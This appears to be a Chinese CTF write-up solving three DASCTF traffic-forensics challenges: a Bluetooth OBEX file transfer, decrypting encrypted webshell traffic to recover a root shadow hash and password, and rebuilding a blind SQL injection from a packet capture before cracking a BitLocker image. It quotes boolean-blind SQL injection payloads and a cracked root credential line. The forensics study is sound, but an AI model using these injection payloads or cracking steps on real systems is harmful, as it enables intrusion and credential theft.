1、BlueTrace
小hacker用自己的工具手机连接了某个机密电脑的蓝牙,通过这个蓝牙给电脑传输了一个秘密文件,你能找到这个秘密文件的秘密吗?根据提示传输文件,按大小降序,发现OBEX
发现传输了JPG文件,脚本转导出数据,再转JPG
转JPG图片,发现尾部还有1个ZIP文件,提取出来
发现解压缩密码提示:压缩包密码是蓝牙传输的目标电脑名字
得到解压缩密码:infernityのpc,发现无法解压缩,盲猜是大小写的问题,生成所有大小写的密码字典
正确解压缩密码:INFERNITYのPC,解压缩后得到flag.png
所有像素RGB都相同,16进制转字符串发现提示,将横向将像素的R通道全部提取出来并转16进制
DASCTF{0ba687ee-60e0-4697-8f4c-42e9b81d2dc6}
2、Webshell Plus
这段流量有点熟悉,又有点陌生...(禁止攻击题目中出现的公网IP,与解出题目无关)flag为root用户的密码的md5值,例如root用户的密码为123456,则flag为DASCTF{e10adc3949ba59abbe56e057f20f883e}根据题目,观察一下发现最后出现大量shell.php
直接双击跳到分组52493,然后往前翻
AES加解密的Key使用RSA加密传输
传输RSA公钥
LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZnbU95bVQ5RUp2QzhzSFRXeG92MExRV1NvbQpMNURQUmlUVUVuUW5yRG1LWUd2TlNOTUozVjFmUjFocjlqUTZvZXB2UXZqTXlXc3lUTDZKM245bmJPR2Q1dGV5Ci80QkxUWEhReWFYY1NwZmwzejYxZkJKenk5MXJaclhiek1ZMWFkSEg0Vll5VW9EUTdxa0YyL1JWblI4UEpWelIKb0puK1hhSDNSYWJrekhpdEFnTUJBQUU9Ci0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
-----BEGIN PUBLIC KEY-----
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFgmOymT9EJvC8sHTWxov0LQWSom
L5DPRiTUEnQnrDmKYGvNSNMJ3V1fR1hr9jQ6oepvQvjMyWsyTL6J3n9nbOGd5tey
/4BLTXHQyaXcSpfl3z61fBJzy91rZrXbzMY1adHH4VYyUoDQ7qkF2/RVnR8PJVzR
oJn+XaH3RabkzHitAgMBAAE=
-----END PUBLIC KEY-----
获得p值:519a73ca97a9e3ea,MD5后取前16位:d14d8ce94563e71a,后续AES解密的Key,题目要提交root的密码,通常在返回数据中
root:$6$usxF0HGWeE25vIFv$keFDGNYIyFJVioH.RNFyVrtK7wK3o.q5U6vTgZGFWN9NZxFGOxesnd523tCBxIF4CHY8ak3u5nid8LPwVtBGT1:20239:0:::::
root密码:slideshow
DASCTF{f3d279e1b58a1e25c092b018f035d406}
3、一把嗦
总感觉本题的出题人在隐约内涵只会用流量工具一把梭的CTFer!
题目附件222.pcapng,都是HTTP流量数据,直接导出
导出一堆文件,直接查看Request的汇总,最后出现了与flag有关的注入请求
SQL注入过程大致为注册 — 登录 — 查看用户状态,如果提示:尊贵的VIP用户,那就表示注入的字符正确
import os
folder = "./out/"
lst = os.listdir(folder)
out = ""
tmp = ""
flag = []
for i in lst:
i = folder + i
f = open(i,"r",encoding="utf-8")
all_str = f.read().strip()
f.close()
if "(SELECT+content+FROM+flag)," in all_str and "login=1" in all_str:
tmp_lst = all_str.split("\n")
for j in tmp_lst:
if "(SELECT+content+FROM+flag)," in j and "login=1" in j:
tmp = j.strip()
if "您是尊贵的VIP用户" in all_str and len(tmp)>0:
out = out + tmp + "\n"
flag.append(tmp.split("1))=")[1].split("+--+")[0])
print(out)
print(flag)获取flag的ASCII码
username='+or+unicode(substr((SELECT+content+FROM+flag),1,1))=82+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),2,1))=69+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),3,1))=70+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),4,1))=84+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),5,1))=81+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),6,1))=49+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),7,1))=82+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),8,1))=71+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),9,1))=101+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),10,1))=122+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),11,1))=107+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),12,1))=48+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),13,1))=79+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),14,1))=71+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),15,1))=85+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),16,1))=48+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),17,1))=89+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),18,1))=122+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),19,1))=103+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),20,1))=53+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),21,1))=76+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),22,1))=84+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),23,1))=78+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),24,1))=108+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),25,1))=77+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),26,1))=109+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),27,1))=81+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),28,1))=116+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),29,1))=78+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),30,1))=68+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),31,1))=108+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),32,1))=108+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),33,1))=79+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),34,1))=83+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),35,1))=48+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),36,1))=52+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
['82', '69', '70', '84', '81', '49', '82', '71', '101', '122', '107', '48', '79', '71', '85', '48', '89', '122', '103', '53', '76', '84', '78', '108', '77', '109', '81', '116', '78', '68', '108', '108', '79', '83', '48', '52', '57', '57', '57', '57', '57', '57', '57', '57']
得到flag的前半段
REFTQ1RGezk0OGU0Yzg5LTNlMmQtNDllOS04
DASCTF{948e4c89-3e2d-49e9-8
导出35MB的index.php,发现包含Base64编码,解码后是7z文件,解压缩得到secret.vmdk,RStudio加载,发现BitLocker加密
Hashcat爆破
得到解密Key:esternocleidomastoideo
aaencode — Rot8000
DASCTF{948e4c89-3e2d-49e9-881a-4ba1ae5dde7e}
扫一扫
3324
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
